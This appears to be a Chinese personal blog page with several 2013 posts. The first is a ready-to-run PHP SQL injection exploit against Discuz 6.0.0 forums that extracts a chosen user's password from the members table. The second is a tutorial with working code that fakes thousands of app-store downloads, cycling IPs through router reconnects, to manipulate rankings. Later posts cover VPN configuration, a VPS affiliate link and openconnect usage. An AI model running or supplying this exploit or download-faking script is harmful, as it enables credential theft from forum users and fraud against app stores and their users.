杜工版discuz6.0.0漏洞利用脚本0+

27,078 views / 2013.08.18 / 3:03 下午

杜工版discuz6.0.0漏洞利用脚本
学习研究技术用,切勿用于非法用途
修改域名和要破解的用户uid后,运行查看输出内容中是否有密码,如果没有说明论坛漏洞已经被修复
代码如下:

error_reporting(E_ALL&E_NOTICE);
/*杜工版discuz6.0.0漏洞利用脚本*/
/*学习研究技术用,切勿用于非法用途*/
$host = "www.xxx.com";
$path = "forum/";
$port = 80;
$uid = 1;
$content = "action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" . $uid . "/*&do=submit";

$data = "POST /" . $path . "/index.php" . " HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: wap\r\n";
$data .= "Host: " . $host . "\r\n";
$data .= "Content-length: " . strlen($content) . "\r\n";
$data .= "Connection: Close\r\n";
$data .= "\r\n";
$data .= $content . "\r\n\r\n";
$ock = fsockopen($host, $port);
if (!$ock) {
	echo 'No response from ' . $host . "\n";;
	die;
} 
fwrite($ock, $data);
while (!feof($ock)) {
	echo fgets($ock, 1024);
}
Categories: 感悟 Tags:

如何刷应用商店排名0+

83,870 views / 2013.07.01 / 9:09 下午

目前应用商店可谓五花八门,比较简单的是直接把官方商店的应用信息都抓过来,赚个展现的广告费,如gao7.com; 略复杂的是内容全部开发者自提,相当于重新做了个应用商店,可以和官方抗衡,如91.com; 再复杂些的就是结合前面两点的内容,既有开发者的提交,也有自动从官方的抓取,如同步推和25pp.  杜工将以25pp为例,从技术层面介绍刷应用排名的详细的方法。

知识储备:

1. tcp通讯的基本方式

2.抓包工具的使用 ,杜工喜欢的是fiddler.(http://fiddler2.com/)

3.家用路由器基本配置

4.php基础

原理:

利用路由器重拨功能变换ip,然后用php工具模拟手机助手向服务器发送下载数据,以达到目的。

Step 1:

打开手机应用PP助手,找到要刷的应用,开始抓包,然后点下载,停止抓包。在抓包工具中找到下载过程中进行的网络通讯,将post的内容予以保存. 此时注意,post的内容是一堆乱码,不要复制保存,而要使用16进制模式的”save to selected”功能, 我们将其保存为hex文件. 并记录header头信息:

 
1

图1 找到下载的tcp连接

 

2

图2 保存post的boday信息到文件

 

记录header头信息:

POST <a href="http://mobileup.25pp.com/index.php:80">http://mobileup.25pp.com/index.php:80</a> HTTP/1.1
Host: mobileup.25pp.com
Connection: keep-alive
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: pgv_pvi=4947xxxxx; Hm_lvt_80c7667d40c35eec40368ef5cd6547d4=1372384421; __utma=113739972.1739925924.1372384420.1372384420.1372384420.1; __utmz=113739972.1372384420.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E7%BE%8E%E8%85%BF%E9%89%B4%E8%B5%8F
Accept-Language: zh-cn
Accept: */*
Content-Length: 63
Connection: keep-alive
User-Agent: 25pp/0.990 CFNetwork/609.1.4 Darwin/13.0.0

Step 2:

用电脑登陆到路由器管理后台,查看断开连接和开始连接的页面,并记录header头信息。我家的比较简单,直接post不同变量到同一个链接地址,就可以实现路由器重拨,以达到换ip功能。该过程具体不在详述,一会儿在php文件中体现。

 

Step 3:

开始编码:

 

<?php
 
//开始模拟下载过程
$host = "mobileup.25pp.com";
$path = "index.php:80";
$port = 80;
$content = file_get_contents("hex");
 
$data = "POST /" . $path . " HTTP/1.1\r\n";
$data .= "Connection: keep-alive\r\n" . "Accept-Encoding: gzip, deflate\r\n" . "Content-Type: application/x-www-form-urlencoded\r\n" . "Cookie: pgv_pvi=4947xxxxx; Hm_lvt_80c7667d40c35eec40368ef5cd6547d4=1372384421; __utma=113739972.1739925924.1372384420.1372384420.1372384420.1; __utmz=113739972.1372384420.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E7%BE%8E%E8%85%BF%E9%89%B4%E8%B5%8F\r\nAccept-Language: zh-cn\r\n" . "Accept: */*\r\n" . "Content-Length: 63\r\n" . "Connection: keep-alive\r\n" . "User-Agent: 25pp/0.990 CFNetwork/609.1.4 Darwin/13.0.0\r\n";
 
$data .= "\r\n";
$data .= $content . "\r\n\r\n";
//刷1000次不过分吧?
while ($j < 1000) {
	$j++;
	for($i = 0;$i < 21;$i++) {
		$ock = fsockopen($host, $port);
		if (!$ock) {
			echo 'No response from ' . $host . "\n";; 
			// die;
		} 
		fwrite($ock, $data);
		while (!feof($ock)) {
			echo fgets($ock, 1024);
		} 
		sleep(1);
		echo $j . "\t" . $i . "\n";
	} 
	reconnect();
       //路由器更换ip需要一定的时间,视情况而定。
	sleep(15 * 60);
} 
function curl($url, $ifpost = 0, $datafields = '', $cookiefile = '') {
       //这个地方要注意了,是路由器的认证登陆信息,抓包的时候应该会有所体现。
	$header = array("Authorization: Basic XXXXXXXXXX=");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
	$ifpost && curl_setopt($ch, CURLOPT_POST, $ifpost);
	$ifpost && curl_setopt($ch, CURLOPT_POSTFIELDS, $datafields);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
	curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate');
	$cookiefile && curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiefile);
	$cookiefile && curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiefile);
	$r = curl_exec($ch);
	curl_close($ch);
	return $r;
} 
function reconnect() {
	// 断开
	$t1 = curl("http://192.168.1.1/RST_conn_status.htm");
	preg_match("/timestamp=([0-9]+)/", preg_replace("/[\n]/", "", $t1), $m);
	curl("http://192.168.1.1/apply.cgi?/RST_conn_status.htm%20timestamp=" . $m[1], 1, "submit_flag=connect_status&endis_connect=0");
	sleep(10); 
	// 连接
	$t1 = curl("http://192.168.1.1/RST_conn_status.htm");
	preg_match("/timestamp=([0-9]+)/", preg_replace("/[\n]/", "", $t1), $m);
	curl("http://192.168.1.1/apply.cgi?/RST_conn_status.htm%20timestamp=" . $m[1], 1, "submit_flag=connect_status&endis_connect=3");
	sleep(20);
}

 

好了,编码完成。到 cmd中运行下看看效果吧。

Categories: 感悟 Tags:

vpn无法正常访问https网站的解决办法1+

49,780 views / 2013.06.07 / 12:12 上午

前阵子忽然发现在国外假设的vpn在家无法访问https网站了,检查了路由什么的都正常,遂怀疑是小区宽带的防火墙作祟,不了了之。

今儿晚上又仔细分析了下,会不会是前阵子换了无线路由器的原因呢?以前也遇到过nat功能没打开导致vpn无法连接的问题,于是登陆到路由器管理平台,发现有个转发规则栏目,进入后,打开“特殊应用程序”,有如下文字提示:

某些程序需要多条连接,如Internet游戏,视频会议,网络电话等。由于防火墙的存在,这些程序无法在简单的NAT 路由下工作。特殊应用程序使得某些这样的应用程序能够在NAT路由下工作。

看来很大可能就是它的问题了,添加一个条目:

ID 触发端口 触发协议 开放端口 开放协议 状态 编辑
1 1723 ALL 1723 ALL 生效

其中1723是pptp协议要使用的端口。

断开电脑网络,重新连接,发现问题得到解决。

后来重启了电脑,发现又不行了,捯饬了半天,原来是路由器MTU数的问题,改成1490,重启路由,搞定。

Categories: 分享 Tags:

国外VPS推荐0+

59,723 views / 2013.05.31 / 4:04 下午

不知道不觉中,本站使用的VPS已经三年多了,这三年不管从服务还是稳定性都比较满意。前文(http://www.71j.cn/archives/250)已经做过推荐了,忍不住再推荐下:
http://www.diahosting.com/client/aff.php?aff=1041
有任何使用问题可联系24小时QQ客服或者电话。

Categories: 感悟 Tags:

Cisco AnyConnect VPN 在linux系统下连接方法[通用]0+

119,690 views / 2013.05.30 / 4:04 下午

前文介绍了针对Cisco AnyConnect VPN在win8和mac系统下的连接方法,但有朋友反馈说在mac系统下的软件安装后无法使用。遂奉上@virtman 大师的linux通用方法。

首先安装openconnect

$ sudo yum install openconnect   (在Fedora上,会顺带安装:vpnc-script.noarch,这个包会被openconnect用到)

$ sudo openconnect –script /etc/vpnc/vpnc-script https://your-vpn-server.com

Attempting to connect to 121.0.29.22:443
SSL negotiation with vpn.taobao.org
Server certificate verify failed: signer not found
Certificate from VPN server “your-vpn-server.com” failed verification.
Reason: signer not found
Enter ‘yes’ to accept, ‘no’ to abort; anything else to view: yes
Connected to HTTPS on your-vpn-server.com
GET https://your-vpn-server.com/
Got HTTP response: HTTP/1.0 302 Object Moved
SSL negotiation with your-vpn-server.com
Server certificate verify failed: signer not found
Connected to HTTPS on your-vpn-server.com
GET https://your-vpn-server.com/+webvpn+/index.html
Please enter your username and password.
Username: your-name
PASSCODE: ********
POST https://your-vpn-server.com/+webvpn+/index.html
Got CONNECT response: HTTP/1.1 200 OK
CSTP connected. DPD 30, Keepalive 20
Connected tun0 as 10.1.25.155, using SSL

 

至此,连接成功。ctrl+z然后bg置入后台运行即可。

Categories: 分享 Tags: